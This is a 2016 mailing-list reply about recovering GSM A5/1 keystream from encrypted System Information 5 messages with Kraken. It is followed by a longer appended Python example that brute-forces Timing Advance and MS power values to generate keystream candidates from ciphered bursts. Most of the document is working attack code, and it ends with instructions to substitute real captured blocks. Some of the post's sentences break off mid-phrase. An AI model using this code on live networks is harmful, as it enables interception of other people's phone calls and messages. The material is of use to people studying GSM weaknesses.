[A51] Next Encrypted SI 5 - Timing Advance - FPC

Вадим Яницкий axilirator at gmail.com
Tue Apr 12 09:29:19 CEST 2016

1) I think this guide will help you (a great explanation by Sylvain):

Some networks broadcast SI packets in a random sequence, and also the Ciphering Mode Command is not always sent after a constant count of frames. So this method can be useless for you.

You can use the frame number to guess whether a burst is related to SI5, SI5ter or SI6. Also, if you use OsmocomBB, try this condition:
if (burst->flags & BI_FLG_SACCH) { ... }

SI5 is not the only message type you can use to find the keystream. There are also SI5ter, SI6 and the "LAPDm U func=UI" packets. The last one is more difficult to

2) I've never used the gsmframecoder. All I know is that Timing Advance is not the only changing value. There is also the MS Power Level, and it can be changed (sometimes often) during a transmission too. Both of these parameters negatively affect the cracking success, i.e. if at least one of them changes, Kraken will find nothing or even give you some false positive results.

I think there is a way to solve this problem. We can try to brute force some range of possible values for TA and MS Power Level. This way we should prepare a
of modified SI packets (4 bursts each) using the one original. And then we will be able to XOR every supposed encrypted SI packet with each prepared plaintext

Best regards,
Яницкий Вадим.
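
The brute-force idea from point 2 above, worked through as an added example; this is not code from the original post, nor from OsmocomBB, gsmframecoder or Kraken. It takes one SI5 block, varies the Timing Advance and MS Power Level fields of its SACCH L1 header over a range of guesses, channel-codes each variant into its 4 bursts (FIRE code, rate 1/2 convolutional code and interleaving as in GSM 05.03 section 4.1) and XORs them with the ciphered bursts, giving one keystream candidate per guess. Assumptions, all mine: the L1 header layout (ordered MS power level and FPC in octet 1, ordered TA in octet 2, as I read TS 44.004 section 7.1), the constructed SI5 payload, and a seeded random keystream standing in for A5/1 so the whole thing runs offline. The per-burst difference between two guesses also shows why a TA or power change breaks the attack: even a one-step change lands in all four bursts.

```python
# Added example, not code from the original post, OsmocomBB, gsmframecoder
# or Kraken. Channel coding per GSM 05.03 section 4.1; the SACCH L1 header
# layout (assumed from TS 44.004 section 7.1) and the SI5 payload are
# constructed, and a seeded random keystream stands in for A5/1.
import random

# g(D) = (D^23 + 1)(D^17 + D^3 + 1) = D^40 + D^26 + D^23 + D^17 + D^3 + 1
FIRE_POLY = (1 << 40) | (1 << 26) | (1 << 23) | (1 << 17) | (1 << 3) | 1

def octets_to_bits(octets):
    """Bit 1 (LSB) of each octet is sent first, so it becomes d(0)."""
    return [(o >> i) & 1 for o in octets for i in range(8)]

def _poly_mod(bits):
    """Remainder modulo g(D) of the polynomial given as MSB-first bits."""
    reg = 0
    for b in bits:
        reg = (reg << 1) | b
        if reg & (1 << 40):
            reg ^= FIRE_POLY
    return reg

def fire_parity(d):
    """40 parity bits: remainder of d(D)*D^40, inverted, so the codeword
    divides by g(D) with remainder 1 + D + ... + D^39 (05.03 4.1.1)."""
    inv = _poly_mod(d + [0] * 40) ^ ((1 << 40) - 1)
    return [(inv >> (39 - i)) & 1 for i in range(40)]

def fire_check(codeword):
    """True for a valid 224-bit FIRE codeword (184 info + 40 parity bits)."""
    return _poly_mod(codeword) == (1 << 40) - 1

def conv_encode(u):
    """Rate 1/2, constraint length 5: G0 = 1+D^3+D^4, G1 = 1+D+D^3+D^4."""
    at = lambda i: u[i] if i >= 0 else 0
    c = []
    for k in range(len(u)):
        c.append(at(k) ^ at(k - 3) ^ at(k - 4))
        c.append(at(k) ^ at(k - 1) ^ at(k - 3) ^ at(k - 4))
    return c

def interleave(c):
    """456 coded bits -> 4 bursts of 114 bits (05.03 4.1.4). The two
    stealing flags of each burst are not ciphered and are left out."""
    bursts = [[0] * 114 for _ in range(4)]
    for k, bit in enumerate(c):
        bursts[k % 4][2 * ((49 * k) % 57) + ((k % 8) // 4)] = bit
    return bursts

def encode_sacch(block_octets):
    """23 octets (L1 header + L2 frame) -> the 4 x 114 ciphered bits."""
    d = octets_to_bits(block_octets)          # 184 info bits
    u = d + fire_parity(d) + [0, 0, 0, 0]     # + 40 parity + 4 tail = 228
    return interleave(conv_encode(u))

# Constructed SI5 L2 frame (21 octets): LAPDm UI (address 0x03, control
# 0x03), length 0x49 (18 octets, EL=1), RR PD 0x06, SI5 type 0x1D and a
# made-up 16-octet Neighbour Cell Description.
SI5_L2 = [0x03, 0x03, 0x49, 0x06, 0x1D,
          0x10, 0x00, 0x04, 0x00, 0x00, 0x80, 0x00, 0x00,
          0x00, 0x20, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00]

def si5_block(ta, ms_power, fpc=0):
    """Assumed L1 header (octet 1: FPC in bit 6, ordered MS power level in
    bits 1-5; octet 2: ordered TA in bits 1-7) followed by the SI5 frame."""
    return [((fpc & 1) << 5) | (ms_power & 0x1F), ta & 0x7F] + SI5_L2

def xor_bursts(a, b):
    return [[x ^ y for x, y in zip(ba, bb)] for ba, bb in zip(a, b)]

def bits_differing(a, b):
    """Per-burst Hamming distance between two sets of 4 bursts."""
    return [sum(x ^ y for x, y in zip(ba, bb)) for ba, bb in zip(a, b)]

def keystream_candidate(cipher_bursts, ta, ms_power, fpc=0):
    """The keystream the network must have used if this guess is right."""
    return xor_bursts(cipher_bursts, encode_sacch(si5_block(ta, ms_power, fpc)))

def candidate_keystreams(cipher_bursts, ta_range, power_range):
    """One keystream candidate per (TA, power) guess: one Kraken job each."""
    return {(ta, pw): keystream_candidate(cipher_bursts, ta, pw)
            for ta in ta_range for pw in power_range}

def simulate_ciphered_si5(ta, ms_power, seed=1):
    """Stand-in for a captured SI5: a seeded random keystream replaces A5/1."""
    rng = random.Random(seed)
    keystream = [[rng.randrange(2) for _ in range(114)] for _ in range(4)]
    return xor_bursts(encode_sacch(si5_block(ta, ms_power)), keystream), keystream

if __name__ == "__main__":
    cipher, real_ks = simulate_ciphered_si5(ta=5, ms_power=10)
    cands = candidate_keystreams(cipher, range(64), range(32))
    print(len(cands), "Kraken jobs for the full TA x MS power range")
    print("right guess recovers the keystream:", cands[(5, 10)] == real_ks)
    # A one-step-off guess is wrong in every burst: this is why a TA or
    # power change between the known and the ciphered packet breaks it.
    print("wrong bits per burst, TA 6 instead of 5:",
          bits_differing(cands[(6, 10)], real_ks))
    for burst in cands[(5, 10)]:
        print("".join(map(str, burst)))   # 114-bit keystream per burst
```

Each candidate is a separate Kraken job, so the full 64 x 32 range costs 2048 jobs per captured packet; narrowing TA to values near the last one seen in clear (and power to the levels the network actually ordered) is what keeps this practical. The constructed SI5 payload and header layout only matter for the bit pattern, not for the method: replace them with the real block decoded before the Ciphering Mode Command.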
